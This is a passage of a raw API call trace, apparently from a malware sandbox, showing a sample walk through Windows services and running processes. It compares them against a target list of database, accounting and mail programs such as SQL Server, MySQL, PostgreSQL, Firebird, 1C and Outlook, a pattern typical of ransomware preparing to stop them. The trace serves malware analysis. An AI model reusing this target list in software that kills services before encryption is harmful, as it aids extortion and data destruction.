[0271.431] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0271.431] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0271.431] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0271.431] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0271.431] lstrlenW (lpString="CryptSvc") returned 8 [0271.431] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0271.431] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0271.431] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0271.431] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0271.431] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0271.431] lstrlenW (lpString="CscService") returned 10 [0271.431] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0271.431] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0271.431] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0271.431] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0271.431] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0271.431] lstrlenW (lpString="DcomLaunch") returned 10 [0271.431] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0271.431] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0271.431] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0271.431] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0271.432] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0271.432] lstrlenW (lpString="Dhcp") returned 4 [0271.432] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0271.432] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0271.432] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0271.432] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0271.432] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0271.432] lstrlenW (lpString="Dnscache") returned 8 [0271.432] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0271.432] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0271.432] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0271.432] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0271.432] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0271.432] lstrlenW (lpString="DPS") returned 3 [0271.432] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0271.432] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0271.432] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0271.432] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0271.432] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0271.432] lstrlenW (lpString="eventlog") returned 8 [0271.432] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0271.432] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0271.432] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0271.432] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0271.432] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0271.432] lstrlenW (lpString="EventSystem") returned 11 [0271.432] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0271.432] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0271.432] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0271.432] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0271.433] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0271.433] lstrlenW (lpString="gpsvc") returned 5 [0271.433] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0271.433] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0271.433] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0271.433] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0271.433] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0271.433] lstrlenW (lpString="LanmanWorkstation") returned 17 [0271.433] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0271.433] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0271.433] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0271.433] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0271.433] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0271.433] lstrlenW (lpString="lmhosts") returned 7 [0271.433] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0271.433] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0271.433] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0271.433] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0271.433] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0271.433] lstrlenW (lpString="MMCSS") returned 5 [0271.433] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0271.433] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0271.433] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0271.433] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0271.433] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0271.433] lstrlenW (lpString="MpsSvc") returned 6 [0271.433] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0271.433] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0271.433] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0271.434] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0271.434] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0271.434] lstrlenW (lpString="NlaSvc") returned 6 [0271.434] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0271.434] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0271.434] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0271.434] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0271.434] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0271.434] lstrlenW (lpString="nsi") returned 3 [0271.434] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0271.434] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0271.434] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0271.434] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0271.434] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0271.434] lstrlenW (lpString="PcaSvc") returned 6 [0271.434] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0271.434] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0271.434] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0271.434] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0271.434] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0271.434] lstrlenW (lpString="PlugPlay") returned 8 [0271.434] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0271.434] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0271.435] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0271.435] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0271.435] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0271.435] lstrlenW (lpString="Power") returned 5 [0271.435] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0271.435] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0271.435] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0271.435] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0271.435] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0271.435] lstrlenW (lpString="ProfSvc") returned 7 [0271.435] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0271.435] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0271.435] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0271.435] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0271.435] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0271.435] lstrlenW (lpString="RpcEptMapper") returned 12 [0271.435] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0271.435] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0271.435] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0271.435] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0271.435] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0271.435] lstrlenW (lpString="RpcSs") returned 5 [0271.435] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0271.435] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0271.435] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0271.435] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0271.435] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0271.435] lstrlenW (lpString="SamSs") returned 5 [0271.435] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0271.435] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0271.436] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0271.436] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0271.436] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0271.436] lstrlenW (lpString="Schedule") returned 8 [0271.436] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0271.436] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0271.436] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0271.436] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0271.436] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0271.436] lstrlenW (lpString="SENS") returned 4 [0271.436] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0271.436] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0271.436] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0271.436] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0271.436] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0271.436] lstrlenW (lpString="ShellHWDetection") returned 16 [0271.436] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0271.436] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0271.436] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0271.436] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0271.436] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0271.436] lstrlenW (lpString="Spooler") returned 7 [0271.436] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0271.436] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0271.436] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0271.436] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0271.436] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0271.436] lstrlenW (lpString="Themes") returned 6 [0271.436] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0271.436] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0271.436] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0271.437] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0271.437] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0271.437] lstrlenW (lpString="UxSms") returned 5 [0271.437] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0271.437] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0271.437] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0271.437] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0271.437] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0271.437] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57d8c0 | out: hHeap=0x520000) returned 1 [0271.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x388 [0271.438] Process32FirstW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.438] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0271.438] lstrlenW (lpString="System") returned 6 [0271.438] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0271.438] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0271.438] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0271.438] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0271.438] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0271.438] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0271.438] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0271.438] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0271.438] lstrlenW (lpString="smss.exe") returned 8 [0271.439] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0271.439] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0271.439] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0271.439] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0271.439] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0271.439] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0271.439] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0271.439] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.439] lstrlenW (lpString="csrss.exe") returned 9 [0271.439] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0271.439] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0271.439] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0271.439] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0271.439] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0271.439] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0271.439] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0271.439] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0271.439] lstrlenW (lpString="wininit.exe") returned 11 [0271.440] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0271.440] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0271.440] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0271.440] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0271.440] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0271.440] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0271.440] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0271.440] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0271.440] lstrlenW (lpString="csrss.exe") returned 9 [0271.440] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0271.440] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0271.440] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0271.440] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0271.440] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0271.440] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0271.440] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0271.440] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0271.440] lstrlenW (lpString="winlogon.exe") returned 12 [0271.440] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0271.440] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0271.441] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0271.441] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0271.441] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0271.441] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0271.441] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0271.441] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0271.441] lstrlenW (lpString="services.exe") returned 12 [0271.441] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0271.441] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0271.441] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0271.441] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0271.441] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0271.441] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0271.441] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0271.441] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0271.441] lstrlenW (lpString="lsass.exe") returned 9 [0271.441] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0271.441] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0271.441] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0271.442] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0271.442] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0271.442] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0271.442] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0271.442] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0271.442] lstrlenW (lpString="lsm.exe") returned 7 [0271.442] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0271.442] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0271.442] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0271.442] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0271.442] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0271.442] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0271.442] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0271.442] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.442] lstrlenW (lpString="svchost.exe") returned 11 [0271.442] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.442] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.442] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.442] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.443] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.443] lstrlenW (lpString="svchost.exe") returned 11 [0271.443] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.443] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.443] lstrlenW (lpString="svchost.exe") returned 11 [0271.443] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.443] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.444] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.444] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.444] lstrlenW (lpString="svchost.exe") returned 11 [0271.444] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.444] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.444] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.444] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0271.444] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0271.444] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0271.444] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0271.444] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.444] lstrlenW (lpString="svchost.exe") returned 11 [0271.444] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0271.444] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0271.444] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0271.444] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, 